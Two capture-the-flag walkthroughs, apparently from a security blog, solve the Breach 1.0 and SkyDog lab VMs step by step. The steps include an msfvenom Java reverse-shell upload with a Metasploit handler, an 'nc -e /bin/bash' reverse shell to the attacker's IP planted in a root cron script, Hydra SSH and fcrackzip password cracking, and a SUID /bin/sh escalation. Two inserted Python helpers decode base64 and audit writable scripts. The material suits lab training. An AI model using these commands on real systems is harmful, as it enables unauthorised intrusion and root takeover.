Hack the Breach 1.0 VM (CTF Challenges)

This time we are going to solve a fun VM i.e. Breach 1.0. Let's find out what we already know about it:

Breach 1.0 is the first VM in a multi-part series and is meant to be a beginner to intermediate boot2root/CTF challenge. It is configured with a static IP address (192.168.110.140), so you will need to configure your host-only adapter to this subnet.


nmap -Pn 192.168.110.140


As you can see, almost all ports show as open, which can only mean one thing: an IDS is active.
Now let's start nikto:
nikto -h 192.168.110.140


Nikto proved to be useless in this case, so let's divert our attention to port 80, which is the best-known open port. To investigate it, open the target IP in your browser.


On the home page you will find an image with some dialogue/comments. Open the page source and you will find a base64-encoded string:


<! ------Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->

Decode this string using the HackBar add-on for Mozilla Firefox. Enable the add-on, click its Encoding tab and select the Decode option. It will ask for the string you want to decode; paste the string there and click OK.


It shows another base64 string, which means the string has been encoded twice.


Decode it again the same way and you will get a username and password.
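The two-layer decoding above can be automated instead of pasting into HackBar twice. The following Python script is an added example, not code from the original walkthrough: it peels base64 layers until the result stops being valid base64, and it embeds the blob quoted from the page source as its sample input (`peel_base64` and `wrap_base64` are names chosen here).

```python
import base64
import binascii

# Blob taken from the HTML comment quoted above (Breach 1.0 home page source).
PAGE_BLOB = "Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo"


def _one_layer(text):
    """Return the decoded text if `text` is one complete base64 layer that
    decodes to printable ASCII, otherwise None. validate=True rejects any
    character outside the base64 alphabet, which is how we detect the
    point where the plaintext has been reached."""
    try:
        raw = base64.b64decode(text.strip(), validate=True)
        decoded = raw.decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if not decoded or not decoded.isprintable():
        return None
    return decoded


def peel_base64(text, max_layers=10):
    """Strip nested base64 layers and return (layers_removed, final_text).
    Caveat: a plaintext that happens to be valid base64 (e.g. 'abcd') would
    be peeled one step too far, so the result should still be eyeballed."""
    layers = 0
    while layers < max_layers:
        nxt = _one_layer(text)
        if nxt is None:
            break
        text, layers = nxt, layers + 1
    return layers, text


def wrap_base64(text, layers):
    """Helper for building test inputs: base64-encode `text` `layers` times."""
    data = text.encode("ascii")
    for _ in range(layers):
        data = base64.b64encode(data)
    return data.decode("ascii")


if __name__ == "__main__":
    depth, plain = peel_base64(PAGE_BLOB)
    print(f"{depth} layer(s) removed: {plain}")
```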


Now go back to the home page and click on the image. It will redirect you to another page.


We tried opening every tab but found nothing except the Employee Portal tab. Clicking the Employee Portal tab opens a login page. Log in with the username and password that you just decoded using HackBar.


Once you are logged in, you will see that there are three messages in the inbox. Open each message one by one, as we may find a clue in them.

In the first mail a user is simply sending a message to another user named peter. As we found no clue in it, we move on to the second mail.


The second mail is about the IDS, which confirms our suspicion that an IDS is active.


Moving on to the third mail, you will find that a URL is mentioned and they are talking about an SSL certificate. So let's not wait any longer and open the URL first.

Opening the URL offers a file to download. Download the file and save it.


Now let's search for SSL in the search bar and see what it has to offer.


There is in fact an SSL certificate present. Open it.


In the SSL certificate you will find a URL.

Similarly, open the URL and it will ask you to download a file.

Once you have downloaded the file, open it with Wireshark.
Now that the file is open, try to read it by right-clicking a packet and selecting Follow >> TCP Stream. This is the normal way to read a stream, but as you can see you can't read this one because it is encrypted, and from earlier we know that the SSL certificate will let us read it.

The problem now is that SSL decryption is not set up, so we have to find a way to enable it. Let's look at what Wireshark is showing us: most of the communication takes place on port 8443. This port is used by Tomcat, and the file we downloaded earlier, namely .keystore, might hold all the certificates; we recall that the download page for this keystore mentioned Tomcat, which means our intuition is correct.

After a lot of research on the internet (Security Stack Exchange), we found how to convert the keystore's proprietary format (called JKS) into the standardized PKCS12 format:

keytool -importkeystore -srckeystore keystore -destkeystore mykeystore.p12 -deststoretype PKCS12 -srcalias tomcat

For the passwords we entered tomcat, as it is the usual default. Now the file is ready to import.


So, to enable it, go to the Edit menu in the menu bar and select Preferences from the drop-down menu.

A dialog box will open; select the Protocols option, then select SSL and click the Edit button.


Another dialog box will open. Here, give the IP address of the target and port number 8443, along with the path to the keystore file and the password.


Now that SSL decryption is enabled, right-click a packet and choose Follow, then select SSL Stream.


Finally, you can read the stream. In it you will again find a base64 string. Decode it the same way using HackBar.


Decoding it with HackBar will give you a username and password.


Going through the capture in Wireshark some more will show you a URL:


Opening this URL in the browser shows a Software Foundation page written in Java. On this page you can find a browse option, which means we can upload a malicious file here.


So now let's generate a payload file with msfvenom that is compatible with Java. For this, type:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.128 LPORT=4444 -f war > /root/Desktop/update.war


Go to the browse option now and upload your file.

The file is uploaded.


Now, before clicking on the file, open Metasploit and type:

use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set lhost 192.168.110.128
set lport 4444
exploit

Click the file once you hit enter and you will have your Meterpreter session in no time.
Now drop to a shell and use a small Python script to spawn a proper TTY. For that, type:

shell

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py

python /tmp/asdf.py

Once you reach the terminal, type the following command to see the details:
ls -lsa

As we found nothing in it, we went back by typing:
cd ..


Then go to /home, into milton's directory, and read the file that may hold our flag. Do this with the following steps:

cd home

ls -lsa

cd milton

ls -lsa

cat some_script.sh


LOL! We were trolled, as there was no flag here. Having found nothing, we were back to square one, so we searched everything again thoroughly. And then we found an image called bill.png.


We read its metadata with exiftool by typing:

exiftool bill.png

We found a password here, i.e. coffeestains.

Then look at the passwd file:

cat /etc/passwd

Then su to blumbergh and give coffeestains as the password:

su blumbergh

Then check the user's IDs by typing:
id


On further exploring you will find a file called /usr/share/cleanup/tidyup.sh. The file says that it runs every three minutes in order to defend the machine from hackers. As we have root-level access through sudo, we should be able to modify it, so type:

echo "nc -e /bin/bash 192.168.110.128 8443" > shell.txt

cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

cat /usr/share/cleanup/tidyup.sh


Once the above commands have run, we need a listener to catch the connection and read our flag. For that, type:
nc -lvv -p 8443


YAYYYYY!!! Flag has been captured!!!

Hack the SkyDog VM (CTF Challenge)

Hello friends!! Today we are going to solve another CTF challenge, "SkyDog", which is designed by Mr. James Bower. The purpose of this CTF is to find all six flags hidden throughout the server by hacking network and system services. This can be achieved without hacking the VM file itself. Capturing these flags is quite fun and interesting. Before starting off, I am listing the hints for all 6 flags that we know beforehand; we have to find their answers.
Flag #1 Home Sweet Home or (A Picture is worth a Thousand Words)
Flag #2 When do Androids Learn to Walk?
Flag #3 Who Can You Trust?
Flag #4 Who Doesn’t Love a Good Cocktail Party?
Flag #5 Another Day at the Office
Flag #6 Little Black Box

Penetration Methodology:

Network Scanning (Netdiscover, Nmap)
Inspecting web services (for Flags 1, 2, 3 & 4)
Get the 1st flag from inside SkyDogCon_CTF.jpg (Exiftool)
Get the 2nd flag using robots.txt
Get the 3rd flag from whistler.zip
Generate a dictionary for web directories (Cewl)
Directory brute force (Dirb)
Get the 4th flag from inside PlayTronics
Get the pcap file and grab an audio file (Wireshark)
SSH brute force attack (Hydra)
Spawn a TTY shell on the machine and get the 5th flag (SSH login)
Writable file privilege escalation
Get root access and capture the 6th flag


Walkthrough
Let's start off with scanning the network to find our target.
netdiscover
Our target is 192.168.1.102. Scan the target with nmap.

nmap -A 192.168.1.102
From the result we can see that ports 22 and 80 are open. Therefore, open the IP in the browser. As you can see, there is nothing but the image of the CTF on the webpage.
Download the image and read it with exiftool.
exiftool SkyDogCon_CTF.jpg
Reading the image's metadata, we find the 1st flag.
The first flag is an MD5 hash value, which we crack with an online MD5 cracker. The value comes out as the words Welcome Home, which matches the author's description for the 1st flag.

Flag #1 Home Sweet Home or (A Picture is worth a Thousand Words)
Flag 1: flag {abc40a2d4e023b42bd1ff04891549ae2}: Welcome Home
If you go back to the nmap scan result, you will observe there is a robots.txt file in which 15 entries are allowed and 252 are disallowed.
And yes! Opening it in the browser we found our 2nd flag. So let's crack the MD5 value of the flag.
On cracking it, the value of Flag #2 is Bots.
Flag #2 When do Androids Learn to Walk?
Flag 2: flag {cd4f10fcba234f0e8b2f60a490c306e6}: Bots
After cracking flag #2 we explored robots.txt some more, and upon opening all the allowed directories one by one there was one which opened, i.e. /Setec.
It came up with the following image, titled "Too many secrets", so I decided to review its source code.
So with the help of curl we inspected the following URL and found an /Astronomy directory from there.
curl -v http://192.168.1.102/Setec/
Now open this directory by typing URL: http://192.168.1.102/Setec/Astronomy and here, you will find whistler.zip. Download the file.
This file is password protected, so we need to find the password in order to unzip it. Now run a dictionary attack to find its password with the help of rockyou.txt; for that, type:
fcrackzip -vuD -p /usr/share/wordlists/rockyou.txt whistler.zip
You will find the password, i.e. yourmother, and now of course unzip the file:
unzip whistler.zip
After unzipping you will find Flag #3 and another file with a hint. First open the flag:
cat flag.txt
You will have your flag again as an MD5 value. Crack it with the same method.
Flag #3 Who Can You Trust?
Flag3: flag{1871a3c1da602bf471d3d76cc60cdb9b}: yourmother
Now open the other file:
cat QuesttoFindCosmo.txt
This file will give you a hint regarding OSINT.
OSINT: Open-source intelligence (OSINT) is intelligence collected from publicly available sources. In the intelligence community (IC), the term “open” refers to overt, publicly available sources (as opposed to covert or clandestine sources); it is not related to open-source software or public intelligence.
That means we have to find something related to OSINT. If you recall, there was a similar thing in the movie Sneakers, and so we will use the movie and apply the CeWL technique here. CeWL lets us create a dictionary file from a URL, and here we will use the URL of the movie's page to build the dictionary file. Therefore type:
cewl --depth 1 https://www.imdb.com/title/tt0105435/trivia?ref_=tt_ql_2 -w /root/Desktop/dict.txt
My next step is brute-forcing web directories using the above dictionary "dict.txt" to get some useful directory names with the help of the dirb command.
dirb http://192.168.1.102/ dict.txt
This command will show us the following directories:
· PlayTronics
· Setec
· Astronomy
We have already seen the content of Setec and Astronomy directories and so we will now explore PlayTronics.
And to our luck we found Flag.txt in the PlayTronics directory.
We got the 4th flag from here; let's crack it to get the value of Flag #4.
Crack the flag with the same method and you will have the Flag #4 value, i.e. leroybrown.
Flag #4 Who Doesn’t Love a Good Cocktail Party?
Flag 4 : flag{c07908a705c22922e6d416e0e1107d99}: leroybrown

In PlayTronics we also found a file with a .pcap extension. Open that file with Wireshark. Upon studying its data carefully you will find an audio file; download it.
Upon playing the file you will find it says only one word, i.e. werner brandes. Now "werner brandes" can be our username, so make a text file with possible combinations of the username built from the words "werner brandes". Also make a text file of passwords containing all the flag values that we have found so far.
hydra -v -L dict.txt -P dict.txt.txt 192.168.1.102 ssh
As you can observe, we successfully obtained the SSH username wernerbrandes and password leroybrown.
Now that you have the username and password, log in with SSH:
ssh wernerbrandes@192.168.1.102
And fortunately we also found Flag #5, as an MD5 value.
Crack it with the same method and it will turn out to be Dr. Gunter Janek.
Flag #5 Another Day at the Office
Flag 5: flag{82ce8d8f5745ff6849fa7af1473c9b35}: Dr. Gunter Janek
Now let's find writable files, and for that type:
find / -writable -type f
We will open the sanitizer.py file with the following steps:
cd /lib
cd log
nano sanitizer.py
Here, the following script was added by the admin to clean up all junk files inside /tmp; scripts of this kind are executed at a specific time interval.

Now replace "rm -r /tmp/*" in the following line with the code given below, which will set the SUID bit on /bin/sh after some time.
os.system('chmod u+s /bin/sh')
Now let's go to /bin/sh and try to get root access with the help of the following commands.
/bin/sh
id
whoami
ls
cd BlackBox
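Both walkthroughs escalate through a root-run maintenance script (tidyup.sh on Breach 1.0, sanitizer.py here) that a low-privilege user could overwrite. The following Python audit is an added example, not part of either walkthrough: it walks a directory tree and reports scripts that group or world can write to, using a constructed sample tree (`demo()` is a helper written for this example) so it runs offline.

```python
import os
import stat
import tempfile


def others_can_write(path):
    """True if group or world have write permission on the file."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_scripts(root_dir, suffixes=(".sh", ".py")):
    """Walk root_dir and return relative paths of scripts that a non-owner
    could modify. On a real host, pair each hit with its owner (st_uid == 0
    is the dangerous case when cron runs the script as root) and with the
    cron entry or systemd timer that executes it."""
    hits = []
    for dirpath, _, filenames in os.walk(root_dir):
        for name in filenames:
            if name.endswith(suffixes):
                full = os.path.join(dirpath, name)
                if others_can_write(full):
                    hits.append(os.path.relpath(full, root_dir))
    return sorted(hits)


def demo():
    """Constructed sample tree: one world-writable cleanup script beside a
    correctly permissioned one. Returns the audit findings."""
    with tempfile.TemporaryDirectory() as root:
        cleanup = os.path.join(root, "cleanup")
        os.makedirs(cleanup)
        bad = os.path.join(cleanup, "tidyup.sh")
        good = os.path.join(cleanup, "sanitizer.py")
        for path in (bad, good):
            with open(path, "w") as fh:
                fh.write("# placeholder maintenance script\n")
        os.chmod(bad, 0o666)   # world-writable: anyone can replace its contents
        os.chmod(good, 0o644)  # owner-only write
        return audit_scripts(root)


if __name__ == "__main__":
    print(demo())  # constructed sample yields ['cleanup/tidyup.sh']
```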
And here is our 6th and last flag; let's capture it.
cat flag.txt
Crack the value of the flag with the same method.
Flag #6 Little Black Box
Flag 6: flag {b70b205c96270be6ced772112e7dd03f}: CongratulationsYouDidIt
HURRAYYY!!! All six flags have been captured, and this CTF is completed.